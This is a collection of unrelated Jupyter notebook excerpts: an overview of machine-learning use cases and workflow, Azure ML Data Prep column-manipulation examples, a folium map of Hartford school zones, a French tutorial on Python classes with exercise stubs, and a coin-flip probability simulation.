* User segmentation: Given a set of user behaviors, we might want to better understand what attributes certain users share with other users. For instance, a gaming company might cluster users based on properties like the number of hours played in a given game. The algorithm might reveal that casual players have very different behavior than hardcore gamers, for example, and allow the company to offer different recommendations or rewards to each player.
* Topic modeling: Given a set of documents, we might analyze the different words contained therein to see if there is some underlying relation between them. For example, given a number of web pages on data analytics, a topic modeling algorithm can cluster them into pages about machine learning, SQL, streaming, and so on based on groups of words that are more common in one topic than in others.
Intuitively, it is easy to see how segmenting customers could help a platform cater better to each set of users. However, it may be hard to discover whether or not this set of user segments is “correct”. For this reason, it can be difficult to determine whether a particular model is good or not.
### Recommendation
<img src="https://github.com/soltaniehha/Business-Analytics/blob/master/figs/10-01-recommendation.png?raw=true" width="400" align="center"/>
Recommendation is one of the most intuitive applications of advanced analytics. By studying people’s explicit preferences (through ratings) or implicit ones (through observed behavior) for various products or items, an algorithm can make recommendations on what a user may like by drawing similarities between the users or items. By looking at these similarities, the algorithm makes recommendations to users based on what similar users liked, or what other products resemble the ones the user already purchased. Here are some example use cases:
* Movie recommendations: Netflix uses recommender engines to make large-scale movie recommendations to its users. It does this by studying what movies users watch and do not watch in the Netflix application. In addition, Netflix likely takes into consideration how similar a given user’s ratings are to other users’.
* Product recommendations: Amazon uses product recommendations as one of its main tools to increase sales. For instance, based on the items in our shopping cart, Amazon may recommend other items that were added to similar shopping carts in the past. Likewise, on every product page, Amazon shows similar products purchased by other users.
### Graph Analytics
<img src="https://github.com/soltaniehha/Business-Analytics/blob/master/figs/10-01-graph-analytics.png?raw=true" width="400" align="center"/>
While less common than classification and regression, graph analytics is a powerful tool. Fundamentally, graph analytics is the study of structures in which we specify vertices (which are objects) and edges (which represent the relationships between those objects). For example, the vertices might represent people and products, and edges might represent a purchase. By looking at the properties of vertices and edges, we can better understand the connections between them and the overall structure of the graph. Since graphs are all about relationships, anything that specifies a relationship is a great use case for graph analytics. Some examples include:
* Fraud prediction: Capital One uses graph analytics to better understand fraud networks. By using historical fraudulent information (like phone numbers, addresses, or names) they discover fraudulent credit requests or transactions. For instance, any user accounts within two hops of a fraudulent phone number might be considered suspicious.
* Anomaly detection: By looking at how networks of individuals connect with one another, outliers and anomalies can be flagged for manual analysis. For instance, if typically in our data each vertex has ten edges associated with it and a given vertex only has one edge, that might be worth investigating as something strange.
* Classification: Given some facts about certain vertices in a network, you can classify other vertices according to their connection to the original node. For instance, if a certain individual is labeled as an influencer in a social network, we could classify other individuals with similar network structures as influencers.
* Recommendation: Google’s original web recommendation algorithm, PageRank, is a graph algorithm that analyzes website relationships in order to rank the importance of web pages. For example, a web page that has a lot of links to it is ranked as more important than one with no links to it.
## The Advanced Analytics Process
You should have a firm grasp of some fundamental use cases for machine learning and advanced analytics. However, finding a use case is only a small part of the actual advanced analytics process. There is a lot of work in preparing your data for analysis, testing different ways of modeling it, and evaluating these models. This section will provide structure to the overall analytics process and the steps we have to take to not just perform one of the tasks just outlined, but actually evaluate success objectively in order to understand whether or not we should apply our model to the real world.
<img src="https://github.com/soltaniehha/Business-Analytics/blob/master/figs/10-01-machine-learning-workflow.png?raw=true" width="800" align="center"/>
The overall process involves the following steps (with some variation):
1. Gathering and collecting the relevant data for your task.
2. Cleaning and inspecting the data to better understand it.
3. Performing feature engineering to allow the algorithm to leverage the data in a suitable form (e.g., converting the data to numerical vectors).
4. Using a portion of this data as a training set to train one or more algorithms to generate some candidate models.
5. Evaluating and comparing models against your success criteria by objectively measuring results on a subset of the same data that was not used for training. This allows you to better understand how your model may perform in the wild.
6. Leveraging the insights from the above process and/or using the model to make predictions, detect anomalies, or solve more general business challenges.
These steps won’t be the same for every advanced analytics task. However, this workflow does serve as a general framework for what you’re going to need to be successful with advanced analytics. Let’s break down the process to better understand the overall objective of each step.
**DATA COLLECTION**
Naturally it’s hard to create a training set without first collecting data. Typically this means at least gathering the datasets you’ll want to leverage to train your algorithm.
**DATA CLEANING**
After you’ve gathered the proper data, you’re going to need to clean and inspect it. This is typically done as part of the exploratory data analysis process, or EDA. EDA generally means using interactive queries and visualization methods in order to better understand distributions, correlations, and other details in your data. During this process you may notice you need to remove some values that may have been misrecorded upstream or that other values may be missing. Whatever the case, it’s always good to know what is in your data to avoid mistakes down the road.
**FEATURE ENGINEERING**
Now that you collected and cleaned your dataset, it’s time to convert it to a form suitable for machine learning algorithms, which generally means numerical features. Proper feature engineering can often make or break a machine learning application, so this is one task you’ll want to do carefully. The process of feature engineering includes a variety of tasks, such as normalizing data, adding variables to represent the interactions of other variables, manipulating categorical variables, and converting them to the proper format to be input into our machine learning model.
**TRAINING MODELS**
At this point in the process we have a dataset of historical information (e.g., spam or not spam emails) and a task we would like to complete (e.g., classifying spam emails). Next, we will want to train a model to predict the correct output, given some input. During the training process, the parameters inside of the model will change according to how well the model performed on the input data. For instance, to classify spam emails, our algorithm will likely find that certain words are better predictors of spam than others and therefore weight the parameters associated with those words higher. In the end, the trained model will find that certain words should have more influence (because of their consistent association with spam emails) than others. The output of the training process is what we call a model. Models can then be used to gain insights or to make future predictions. To make predictions, you will give the model an input and it will produce an output based on a mathematical manipulation of these inputs. Using the classification example, given the properties of an email, it will predict whether that email is spam or not by comparing to the historical spam and not spam emails that it was trained on.
However, just training a model isn’t the objective—we want to leverage our model to produce insights. Thus, we must answer the question: how do we know our model is any good at what it’s supposed to do? That’s where model tuning and evaluation come in.
**MODEL TUNING AND EVALUATION**
You likely noticed earlier that we mentioned that you should split your data into multiple portions and use only one for training. This is an essential step in the machine learning process because when you build an advanced analytics model you want that model to generalize to data it has not seen before. Splitting our dataset into multiple portions allows us to objectively test the effectiveness of the trained model against a set of data that it has never seen before. The objective is to see if your model understands something fundamental about this data process or whether or not it just noticed the things particular to only the training set (sometimes called overfitting). That’s why it is called a test set. In the process of training models, we also might take another, separate subset of data and treat that as another type of test set, called a validation set, in order to try out different hyperparameters (parameters that affect the training process) and compare different variations of the same model without overfitting to the test set.
Note: Following proper training, validation, and test set best practices is essential to successfully using machine learning. It’s easy to end up overfitting (training a model that does not generalize well to new data) if we do not properly isolate these sets of data.
**LEVERAGING THE MODEL AND/OR INSIGHTS**
After running the model through the training process and ending up with a well-performing model, you are now ready to use it! Taking your model to production can be a significant challenge in and of itself.
| github_jupyter |

# Column Manipulations
Copyright (c) Microsoft Corporation. All rights reserved.<br>
Licensed under the MIT License.<br>
Azure ML Data Prep has many methods for manipulating columns, including basic CUD operations and several other more complex manipulations.
This notebook will focus primarily on data-agnostic operations. For all other column manipulation operations, we will link to their specific how-to guide.
## Table of Contents
[ColumnSelector](#ColumnSelector)<br>
[add_column](#add_column)<br>
[append_columns](#append_columns)<br>
[drop_columns](#drop_columns)<br>
[duplicate_column](#duplicate_column)<br>
[fuzzy_group_column](#fuzzy_group_column)<br>
[keep_columns](#keep_columns)<br>
[map_column](#map_column)<br>
[new_script_column](#new_script_column)<br>
[rename_columns](#rename_columns)<br>
<a id="ColumnSelector"></a>
## ColumnSelector
`ColumnSelector` is a Data Prep class that allows us to select columns by name. The idea is to be able to describe columns generally instead of explicitly, using a search term or regex expression, with various options.
Note that a `ColumnSelector` does not represent the columns they match themselves, but the selector of the described columns. Therefore if we use the same `ColumnSelector` on two different dataflows, we may get different results depending on the columns of each dataflow.
Column manipulations that can utilize `ColumnSelector` will be noted in their respective sections in this book.
```
# Read the sample CSV with auto-detected parsing and preview the first rows.
from azureml.dataprep import auto_read_file
dflow = auto_read_file(path='../data/crime-dirty.csv')
dflow.head(5)
```
All parameters to a `ColumnSelector` are shown here for completeness. We will use `keep_columns` in our example, which will keep only the columns in the dataflow that we tell it to keep.
In the below example, we match all columns with the letter 'i'. Because we set `ignore_case` to true and `match_whole_word` to false, any column that contains 'i' or 'I' will be selected.
```
from azureml.dataprep import ColumnSelector
# Keep columns whose name contains 'i' (substring match, case-insensitive).
column_selector = ColumnSelector(term="i",
use_regex=False,
ignore_case=True,
match_whole_word=False,
invert=False)
dflow_selected = dflow.keep_columns(column_selector)
dflow_selected.head(5)
```
If we set `invert` to true, we get the opposite of what we matched earlier.
```
# invert=True selects the complement: columns whose name does NOT contain 'i'/'I'.
column_selector = ColumnSelector(term="i",
use_regex=False,
ignore_case=True,
match_whole_word=False,
invert=True)
dflow_selected = dflow.keep_columns(column_selector)
dflow_selected.head(5)
```
If we change the search term to 'I' and set case sensitivity to true, we get only the handful of columns that contain an upper case 'I'.
```
# Case-sensitive match: only columns containing an upper-case 'I'.
column_selector = ColumnSelector(term="I",
use_regex=False,
ignore_case=False,
match_whole_word=False,
invert=False)
dflow_selected = dflow.keep_columns(column_selector)
dflow_selected.head(5)
```
And if we set `match_whole_word` to true, we get no results at all as there is no column called 'I'.
```
# Whole-word match: requires a column named exactly 'I', so nothing matches here.
column_selector = ColumnSelector(term="I",
use_regex=False,
ignore_case=False,
match_whole_word=True,
invert=False)
dflow_selected = dflow.keep_columns(column_selector)
dflow_selected.head(5)
```
Finally, the `use_regex` flag dictates whether or not to treat the search term as a regex. It can be combined still with the other options.
Here we select all columns that begin with the letter 'I' (upper or lower case, since `ignore_case` is true).
```
# Regex match: columns whose name starts with 'I' (case ignored via ignore_case=True).
column_selector = ColumnSelector(term="I.*",
use_regex=True,
ignore_case=True,
match_whole_word=True,
invert=False)
dflow_selected = dflow.keep_columns(column_selector)
dflow_selected.head(5)
```
<a id="add_column"></a>
## add_column
Please see [add-column-using-expression](add-column-using-expression.ipynb).
<a id="append_columns"></a>
## append_columns
Please see [append-columns-and-rows](append-columns-and-rows.ipynb).
<a id="drop_columns"></a>
## drop_columns
Data Prep supports dropping one or more columns in a single statement. Supports `ColumnSelector`.
```
# Reload the sample dataset for the drop_columns examples.
from azureml.dataprep import auto_read_file
dflow = auto_read_file(path='../data/crime-dirty.csv')
dflow.head(5)
```
Note that there are 22 columns to begin with. We will now drop the 'ID' column and observe that the resulting dataflow contains 21 columns.
```
# Drop a single column by name.
dflow_dropped = dflow.drop_columns('ID')
dflow_dropped.head(5)
```
We can also drop more than one column at once by passing a list of column names.
```
# Drop several columns at once by passing a list of names.
dflow_dropped = dflow_dropped.drop_columns(['IUCR', 'Description'])
dflow_dropped.head(5)
```
<a id="duplicate_column"></a>
## duplicate_column
Data Prep supports duplicating one or more columns in a single statement.
Duplicated columns are placed to the immediate right of their source column.
```
# Reload the sample dataset for the duplicate_column example.
from azureml.dataprep import auto_read_file
dflow = auto_read_file(path='../data/crime-dirty.csv')
dflow.head(5)
```
We decide which column(s) to duplicate and what the new column name(s) should be with a key value pairing (dictionary).
```
# Duplicate columns via a {source_name: duplicate_name} mapping.
dflow_dupe = dflow.duplicate_column({'ID': 'ID2', 'IUCR': 'IUCR_Clone'})
dflow_dupe.head(5)
```
<a id="fuzzy_group_column"></a>
## fuzzy_group_column
Please see [fuzzy-group](fuzzy-group.ipynb).
<a id="keep_columns"></a>
## keep_columns
Data Prep supports keeping one or more columns in a single statement. The resulting dataflow will contain only the column(s) specified; dropping all the other columns. Supports `ColumnSelector`.
```
# Reload, then keep only the three listed columns (all others are dropped).
from azureml.dataprep import auto_read_file
dflow = auto_read_file(path='../data/crime-dirty.csv')
dflow.head(5)
dflow_keep = dflow.keep_columns(['ID', 'Date', 'Description'])
dflow_keep.head(5)
```
Similar to `drop_columns`, we can pass a single column name or a list of them.
```
# keep_columns also accepts a single column name.
dflow_keep = dflow_keep.keep_columns('ID')
dflow_keep.head(5)
```
<a id="map_column"></a>
## map_column
Data Prep supports string mapping. For a column containing strings, we can provide specific mappings from an original value to a new value, and then produce a new column that contains the mapped values.
The mapped columns are placed to the immediate right of their source column.
```
from azureml.dataprep import auto_read_file
dflow = auto_read_file(path='../data/crime-dirty.csv')
dflow.head(5)
# Map specific string values of 'Primary Type' into a new column placed
# immediately to the right of the source column.
from azureml.dataprep import ReplacementsValue
replacements = [ReplacementsValue('THEFT', 'THEFT2'), ReplacementsValue('BATTERY', 'BATTERY!!!')]
dflow_mapped = dflow.map_column(column='Primary Type',
new_column_id='Primary Type V2',
replacements=replacements)
dflow_mapped.head(5)
```
<a id="new_script_column"></a>
## new_script_column
Please see [custom-python-transforms](custom-python-transforms.ipynb).
<a id="rename_columns"></a>
## rename_columns
Data Prep supports renaming one or more columns in a single statement.
```
# Reload the sample dataset for the rename_columns example.
from azureml.dataprep import auto_read_file
dflow = auto_read_file(path='../data/crime-dirty.csv')
dflow.head(5)
```
We decide which column(s) to rename and what the new column name(s) should be with a key value pairing (dictionary).
```
# Rename columns via a {current_name: new_name} mapping.
dflow_renamed = dflow.rename_columns({'ID': 'ID2', 'IUCR': 'IUCR_Clone'})
dflow_renamed.head(5)
```
| github_jupyter |
```
import folium
import pandas as pd
import geopandas as gpd
# Load the school directory; keep Hartford rows and the display columns.
schools = pd.read_csv('geodata/Education_Directory.csv')
schools_hartford = schools [ schools.Town == 'Hartford' ].filter(['School Name', 'Organization Type', 'Location'])
# Clean up location coordinates
# (keep the text after '(' and drop the trailing character, leaving "lat,lon").
schools_hartford.Location = schools_hartford.Location.apply(lambda x: x.split('(')[1][:-1])
# Fix locations known to be wrong
schools_hartford.loc[schools_hartford['School Name'] == 'Parkville Community School', 'Location'] = '41.7566013,-72.7077116'
#schools_hartford['Organization Type'].value_counts()
gpd.GeoDataFrame(schools_hartford)
# Initialize map
m = folium.Map(
location=[41.7625, -72.6842],
tiles=None,
zoom_start=13,
control_scale=True,
)
# Add CartoDB Positron baselayer
tiles = folium.TileLayer(
tiles='CartoDB positron',
control=False,
zoom_start=12
)
# Add link to GitHub repo to attribution
tiles.options['attribution'] = '{} | {}'.format(
'<a href="https://github.com/JackDougherty/school-search-tool">View code on GitHub</a>',
tiles.options['attribution']
)
tiles.add_to(m)
# Fill color for each attendance-zone name used by the style function below.
colors = {
'Zone 1': 'purple',
'Zone 2': 'orange',
'Zone 3': 'yellow',
'Zone 4': 'lightblue'
}
# School zones
zones = folium.GeoJson(
f'geodata/hartford-school-attendance-zones-2010.geojson',
name='School Zones',
control=False,
style_function=lambda x: {
'fillOpacity': 0.4,
'fillColor': colors[ x['properties']['Name'] ],
'color': 'black',
'weight': '1'
}
).add_to(m)
# One marker per school; the "lat,lon" string is split into a coordinate pair.
for index, row in schools_hartford.iterrows():
folium.Marker(
location=row.Location.split(','),
tooltip=row['School Name'],
icon=folium.Icon(color='lightblue', icon_color='white', icon='graduation-cap', prefix='fa')
).add_to(m)
# Add Tooltip data
folium.GeoJsonTooltip(fields=['Name'], aliases=['School Attendance']).add_to(zones)
m.save('index2.html')
```
## Manual additions
### Geocoder
```html
<link rel="stylesheet" href="https://unpkg.com/leaflet-control-geocoder/dist/Control.Geocoder.css" />
<script src="https://unpkg.com/leaflet-control-geocoder/dist/Control.Geocoder.js"></script>
```
```js
L.Control.geocoder({
collapsed: false,
geocoder: L.Control.Geocoder.nominatim({
geocodingQueryParams: {
viewbox: '-72.719741,41.720597,-72.640434,41.813167',
bounded: 1,
}
}),
}).addTo(map_3c76f3c5303f44439633e377a081720e);
```
```html
<style>
.leaflet-right {
left: calc(50% - 140px);
}
.leaflet-control-geocoder {
float: left !important;
font-size: 1.3em;
}
.leaflet-top.leaflet-right::before {
content: "Hartford School Zone Lookup";
font-size: 1.8em;
font-weight: bold;
float: left;
margin-left: -15px;
padding: 4px;
border-radius: 4px;
}
.leaflet-control-geocoder-icon {
padding-bottom: 5px;
}
</style>
```
| github_jupyter |
# Programmation Orientée Objet
> Découverte de la notion d'objet
- toc: true
- badges: true
- comments: false
- categories: [python, ISN]
Objets et POO sont au centre de la manière Python fonctionne. Vous n'êtes pas obligé d'utiliser la POO dans vos programmes - mais comprendre le concept est essentiel pour devenir plus qu'un débutant. Entre autres raisons parce que vous aurez besoin d'utiliser les classes et objets fournis par la librairie standard.
De plus, avant d'aborder la programmation d'interfaces graphiques qui utilisent abondamment les objet, des notions autour de la POO seront utiles.
## Petit historique
La programmation en tant que telle est une matière relativement récente. Étonnamment, la programmation orientée objet remonte aussi loin que les années 1960. *Simula* est considéré comme le premier langage de programmation orienté objet.
Les années 1970 voient les principes de la programmation par objet se développer et prendre forme au travers notamment du langage *Smalltalk*.
À partir des années 1980, commence l'effervescence des langages à objets : *Objective C* (début des années 1980, utilisé sur les plateformes Mac et iOS), *C++* (C with classes) en 1983 sont les plus célèbres.
Les années 1990 voient l'âge d'or de l'extension de la programmation par objet dans les différents secteurs du développement logiciel, notamment grâce à l'émergence des systèmes d'exploitation basés sur une interface graphique (MacOS, Linux, Windows) qui font appel abondamment aux principes de la POO.
Nous verrons sur le prochain classeur comment une interface graphique peut se programmer au moyens d'objets (fenêtre, boutons, textes, champs de saisie etc...).
## Programmation procédurale
La programmation procédurale est celle que vous avez utilisé jusqu'à maintenant : cela consiste à diviser votre programme en blocs réutilisables appelés fonctions.
Vous essayez autant que possible de garder votre code en blocs modulaires, en décidant de manière logique quel bloc est appelé. Cela demande moins d’effort pour visualiser ce que votre programme fait. Cela rend plus facile la maintenance de votre code – vous pouvez voir ce que fait une portion de code. Le fait d’améliorer une fonction (qui est réutilisée) peut améliorer la performance à plusieurs endroits dans votre programme.
Vous avez des variables, qui contiennent vos données, et des fonctions. Vous passez vos variables à vos fonctions – qui agissent sur elles et peut-être les modifient. L'interaction entre les variables et les fonctions n'est pas toujours simple à gérer comme on l'a vu dans le classeur précédent ! ou bien une variable est locale et n'est pas visible des autres fonctions, ou bien une variable est globale et toutes les fonctions sont susceptibles d'y avoir accès.
On touche ici aux limites de la programmation procédurale, lorsque le nombre de fonctions et de variables devient important.
## Mais qu’est ce qu’un Objet ?
En Python les éléments de base de la programmation que nous avons rencontré comme les chaînes de caractères, ou les listes sont des objets. Ils possèdent des *propriétés* - variables qui stockent des valeurs - et des *méthodes* - fonctions qui agissent sur ces valeurs.
Voici un petit exemple d'objet qui vous est déjà familier :
```
liste=[3,5,4,2,8,5,4]
liste.sort()
liste
```
Ici nous avons fait appel à la *méthode* **sort()** de l'*objet* **liste** afin de trier notre liste.
Mais dans nos projets futurs, nous pouvons avoir envie de définir nos propres objets, c'est à dire d'enrichir la bibliothèque de types ***built-in*** standard de Python avec des objets que nous façonnerons selon nos besoins. C'est la qu'intervient la notion de classe.
# Création d'une classe
En premier exemple, supposons que nous voulions travailler sur un logiciel de géométrie. Nous avons besoin d'un ***objet*** point qui est un nouveau type d'objet contenant deux informations :
- l'abscisse de notre point
- l'ordonnée de notre point.
Ces deux informations sont ce que nous appelons en POO des ***attributs*** ou des ***propriétés***.
Assez de discours, créons notre classe :
```
class Point:
    """Prototype of a 2-D point, initialised at the origin."""

    # Class-level properties: default coordinates shared by the prototype.
    abscisse = 0
    ordonnee = 0
```
Et c'est tout !!! nous avons créé une classe contenant deux ***propriétés*** une abscisse et une ordonnée toutes deux initialisées à 0.
Comment ça marche ?
```
print (Point.abscisse)
print (Point.ordonnee)
Point.abscisse=2
print (Point.abscisse)
```
Ça a l'air très simple ! En réalité, nous allons vite être limités si nous n'utilisons que cette classe. En effet, nous avons créé un objet classe *Point* qui contient deux informations. Mais dans notre logiciel de géométrie, nous voulons créer plusieurs points !!
C'est le moment de parler de la notion ***d'instance***. Une instance est un objet que nous créons en mémoire à partir d'une classe. Voici comment :
```
p1=Point()
p2=Point()
p1.abscisse=2
p2.ordonnee=3
print (p1.abscisse,p1.ordonnee)
print (p2.abscisse,p2.ordonnee)
```
Nous y voila ! J'ai donc à présent la possibilité de créer autant de points que je veux. Il faut bien distinguer la notion de ***classe*** et la notion ***d'instance*** :
- une ***classe*** peut être vue comme le prototype permettant de créer nos instances
- les ***instances*** sont les véritables objets que nos manipulerons, créés à partir de notre ***prototype***.
Pour bien comprendre ce phénomène, prenons une comparaison avec le monde des contructeurs automobile : Lorsqu'un contructeur va sortir une nouvelle voiture, il ne va pas immédiatement produire en série plusieurs millions de véhicules. Il va tout d'abord élaborer un ***prototype*** :
- d'abord sur ***papier***, il va dessiner sa nouvelle voiture, les formes, les équipements, chaque pièce de sa voiture etc...
- ensuite il va réaliser une maquette, la tester en soufflerie pour affiner sa forme
- enfin, il va réaliser un modèle fonctionnelle qu'il testera sur route : c'est le prototype.
C'est ce travail que nous réaliserons lorsque nous construirons notre ***classe***. Construire une classe c'est construire un ***prototype unique***.
Une fois notre prototype terminé, notre constructeur va passer à la ***production en série***. Il va créer des millions ***d'instances*** de notre prototype qui sont les voitures ***créées en série à partir de notre prototype***. Chaque ***instance*** pourra être personnalisé à partir de notre prototype : en effet chaque nouvelle voiture possèdera sa propre couleur qui n'est pas forcément celle de notre prototype, possèdera des options spécifique (gps, toit ouvrant etc...).
Retenez donc cette comparaison :
- la ***classe*** correspond à notre ***prototype***
- l'***instance*** correspond à la voiture produite ***en série*** à partir de notre prototype (la classe).
## Notion de méthode
Nous avons créé notre objet point qui se caractérise par deux ***propriétés*** : abscisse et ordonnée. Mais si ce n'était que cela, pourquoi ne pas utiliser un tuple ! Nous allons donc enrichir notre classe (le prototype servant de modèle pour créer nos points) en y ajoutant des fonctions uniques : les ***méthodes***.
Nous nous intéressons par exemple à la distance séparant notre point de l'origine du repère. Nous souhaiterions que notre objet point possède une ***méthode*** pour nous renvoyer cette information. Une ***méthode*** n'est autre qu'une ***fonction*** intégrée à un objet. Voici comment procéder. Nous allons modifier notre ***classe*** :
```
from math import sqrt # On a besoin de la racine carrée !
class Point:
    """A 2-D point that knows its distance to the origin."""

    # Default coordinates of the prototype.
    abscisse = 0
    ordonnee = 0

    def distanceAZero(self):
        """Return the Euclidean distance from this point to (0, 0)."""
        x = self.abscisse
        y = self.ordonnee
        return sqrt(x ** 2 + y ** 2)
```
Regardons le résultat :
```
p1=Point()
p1.abscisse=3
p1.ordonnee=4
print(p1.distanceAZero())
```
Et voila ! notre ***objet*** point commence à prendre tournure : il possède
- deux ***propriétés*** : *abscisse* et *ordonnee*
- une ***méthode*** : *distanceAZero()*
Cette méthode est une fonction encapsulée dans notre objet qui agit sur ses propriétés et effecture le travail demandé. Revenons sur la déclaration de cette méthode :
Une méthode se déclare comme une fonction classique à l'*intérieur de la classe* à ceci près qu'elle prend toujours ***en premier argument l'instance sur laquelle elle agit***. Par convention, nous nommons cette instance ***self***.
Nous voyons sur l'exemple de la *distanceAZero* l'avantage de disposer de cette information d'instance : nous voulons que la méthode agisse sur l'***instance*** depuis laquelle elle a été appelée et non sur les propriétés de la classe (le prototype). La variable ***self*** nous permettra de connaître l'instance sur laquelle nous travaillons.
Reste à décrire la syntaxe un peu étrange de cette fonction : Si ***self*** est le premier argument, pourquoi ne le trouve t-on pas lors de l'appel de la fonction *distanceAZero()* ? Voici l'explication.
En réalité, nous devrions passer l'appel à la méthode de cette manière :
```
print(Point.distanceAZero(p1))
```
Ainsi nous voyons bien que distanceAZero accepte bien l'instance sur laquelle elle agit en premier paramètre et que c'est une fonction intégrée à la classe ***Point***. Néanmoins cette syntaxe est très lourde ! Imaginez taper la ligne suivante à la place de
liste.append(5)
```
list.append(liste,'autre syntaxe')
# Et pourtant cela foncitonne !
print(liste)
```
Dans la pratique, une méthode sera toujours appelée depuis une instance et le premier paramètre sera omis puisque il est donnée justement par l'instance qui appelle. Syntaxiquement, les deux formes
Point.distanceAZero(p1)
et
p1.distanceAZero()
sont équivalentes. Nous utiliserons systématiquement la seconde forme.
## A vous de jouer
Vous allez enrichir la classe ***Point*** en ajoutant
- une propriété ***nom*** contenant le nom du point (par défaut 'A')
- une méthode ***distance(p)*** qui
- affichera un texte du type "La distance AB=5" avec bien sûr les vrais noms des points et la vraie distance
- retournera la distance du point au point *p* passé en argument.
Attention, je rappelle qu'une méthode prend ***toujours*** en premier argument ***self***.
```
from math import sqrt # On a besoin de la racine carrée !
# Redéfinissez votre classe
# YOUR CODE HERE
raise NotImplementedError()
```
Pour tester votre classe, validez la cellule suivante. La réponse doit être :
La distance AB = 5.0
Out[...]:5.0
```
p1=Point()
p1.abscisse=2
p1.ordonnee=3
p2=Point()
p2.abscisse=-1
p2.ordonnee=7
p2.nom='B'
assert p1.distance(p2)==5.0
```
# Surcharge des opérateurs
On peut améliorer un peu le comportement de notre classe en initialisant de manière plus propre les différentes propriétés. En effet, pour le moment, pour créer un point avec le bon nom et les coordonnées souhaitées, nous avons besoin de 4 lignes !
p1=Point()
p1.abscisse=2
p1.ordonnee=3
p1.nom='P'
On peut faire beaucoup mieux en ***surchargeant*** la méthode ***__init__()*** qui est une méthode spéciale appelée automatiquement lors de la création d'une instance. Cette méthode prend
- en premier paramètre ***self*** bien évidemment!
- en paramètres optionnels, des paramètres passés à la classe lors de la création.
```
class Point:
    """Named 2-D point built from its coordinates and a label."""

    def __init__(self, x, y, nom):
        """Store the abscissa, the ordinate and the point's name."""
        self.abscisse = x
        self.ordonnee = y
        self.nom = nom

    def distanceAZero(self):
        """Return the Euclidean distance from this point to the origin."""
        return sqrt(self.abscisse ** 2 + self.ordonnee ** 2)

    def distance(self, p):
        """Print and return the Euclidean distance between self and p."""
        dx = self.abscisse - p.abscisse
        dy = self.ordonnee - p.ordonnee
        d = sqrt(dx ** 2 + dy ** 2)
        print("La distance ", self.nom + p.nom, "=", d)
        return d
```
Regardons comment créer notre point :
```
p1=Point(2,3,'A')
p2=Point(-1,7,'B')
p1.distance(p2)
```
C'est quand même bien mieux ! Mais tout n'est pas parfait. Observez ce qui se passe si je veux afficher les coordonnées d'un point. Je peux avoir envie de faire cela :
```
print(p1)
# beark
```
## A vous de jouer
Il existe une autre méthode *magique* - en réalité, il y en a environ 80 - permettant de redéfinir le comportement des opérateurs intégrés à Python. Vous allez créer une méthode nommée ***__str__()*** qui
- ne prendra pas d'argument autre que ***self*** bien sur
- retournera une chaîne de caractère du type "A(2;3)"
Pour construire votre chaîne, vous pourrez utiliser la concaténation de chaines de caractères au moyen de l'opérateur +. Regardez l'exemple :
```
x,y=2,3
chaine="A"+str(x)+"; etc..."
# etc... vous voyez le principe
print(chaine)
# A vous de jouer
# YOUR CODE HERE
raise NotImplementedError()
# Et voila la magie qui s'opère !
p1=Point(2,3,'A')
print(p1)
assert p1.__str__()=='A(2;3)'
```
Et voila, bien venue dans le monde merveilleux des objets.
En seconde partie, nous allons prendre un exemple plus sophistiqué sur les polynômes pour approfondir les notions que nous avons introduites dans ce classeur.
A bientôt !
| github_jupyter |
<h1>Table of Contents<span class="tocSkip"></span></h1>
<div class="toc"><ul class="toc-item"><li><span><a href="#What-is-Probability-Theory?" data-toc-modified-id="What-is-Probability-Theory?-1"><span class="toc-item-num">1 </span>What is Probability Theory?</a></span><ul class="toc-item"><li><span><a href="#A-simple-(?)-question" data-toc-modified-id="A-simple-(?)-question-1.1"><span class="toc-item-num">1.1 </span>A simple (?) question</a></span></li><li><span><a href="#Simulating-coin-flips" data-toc-modified-id="Simulating-coin-flips-1.2"><span class="toc-item-num">1.2 </span>Simulating coin flips</a></span></li><li><span><a href="#Summary" data-toc-modified-id="Summary-1.3"><span class="toc-item-num">1.3 </span>Summary</a></span></li></ul></li><li><span><a href="#What-is-probability-theory?" data-toc-modified-id="What-is-probability-theory?-2"><span class="toc-item-num">2 </span>What is probability theory?</a></span></li></ul></div>
```
%pylab inline
```
# What is Probability Theory?
* Probability Theory is a **mathematical** framework for computing the probability of complex events.
* Under the assumption that **we know the probabilities of the basic events.**
* What is the precise meaning of <font color='red'>"probability"</font> and <font color='red'>"event"</font>?
* We will give precise definitions later in the class.
* For now, we'll rely on common sense.
## A simple (?) question
We all know that if one flips a fair coin then the outcome is "heads" or "tails" with equal probabilities.
What does that mean?
It means that if we flip the coin $k$ times, for some large value of $k$, say $k=10,000$,
Then the number of "heads" is **about** $\frac{k}{2}=\frac{10,000}{2} = 5,000$
What do we mean by **about** ??
## Simulating coin flips
We will use the pseudo random number generators in `numpy` to simulate the coin flips.
instead of "Heads" and "Tails" we will use $x_i=1$ or $x_i=-1$ and consider the sum $S_{10000} = x_1+x_2+\cdots+x_{10000}$.
If the number of heads is about 5,000 then $S_{10000}\approx 0$
We will vary the number of coin flips, which we denote by $k$
```
# Generate the sum of k coin flips, repeat that n times
def generate_counts(k=1000, n=100):
    """Simulate n experiments of k fair coin flips.

    Each flip is encoded as +1 ("heads") or -1 ("tails"); the return
    value is a length-n array whose entries are the sums
    S_k = x_1 + ... + x_k of one experiment each.

    Parameters
    ----------
    k : int, default 1000
        Number of coin flips per experiment.
    n : int, default 100
        Number of independent experiments.
    """
    # k x n matrix of +-1 values.  Explicit np.* calls avoid relying on
    # %pylab's star imports (whose `sum` shadows the builtin — the
    # original `sum(X, axis=0)` only works under that shadowing).
    X = 2 * (np.random.rand(k, n) > 0.5) - 1
    return X.sum(axis=0)
k=1000
n=1000
counts=generate_counts(k=k,n=n)
figure(figsize=[10,4])
hist(counts);
xlim([-k,k])
xlabel("sum")
ylabel("count")
title("Histogram of coin flip sum when flipping a fair coin %d times"%k)
grid()
```
Note that the sum $S_{1000}$ is not **exactly** $0$, it is only **close to** $0$.
Using **probability theory** we can calculate **how small** is $\big|S_k\big|$
In a later lesson we will show that the probability that
$$\big| S_k \big| \geq 4\sqrt{k}$$
is smaller than $2 \times 10^{-8}$ which is $0.000002\%$
Let's use our simulation to demonstrate that this is the case:
```
from math import sqrt
figure(figsize=[13,3.5])
for j in range(2,5):
k=10**j
counts=generate_counts(k=k,n=100)
subplot(130+j-1)
hist(counts,bins=10);
d=4*sqrt(k)
plot([-d,-d],[0,30],'r')
plot([+d,+d],[0,30],'r')
grid()
title('%d flips, bound=+-%6.1f'%(k,d))
figure(figsize=[13,3.5])
for j in range(2,5):
k=10**j
counts=generate_counts(k=k,n=100)
subplot(130+j-1)
hist(counts,bins=10);
xlim([-k,k])
d=4*sqrt(k)
plot([-d,-d],[0,30],'r')
plot([+d,+d],[0,30],'r')
grid()
title('%d flips, bound=+-%6.1f'%(k,d))
```
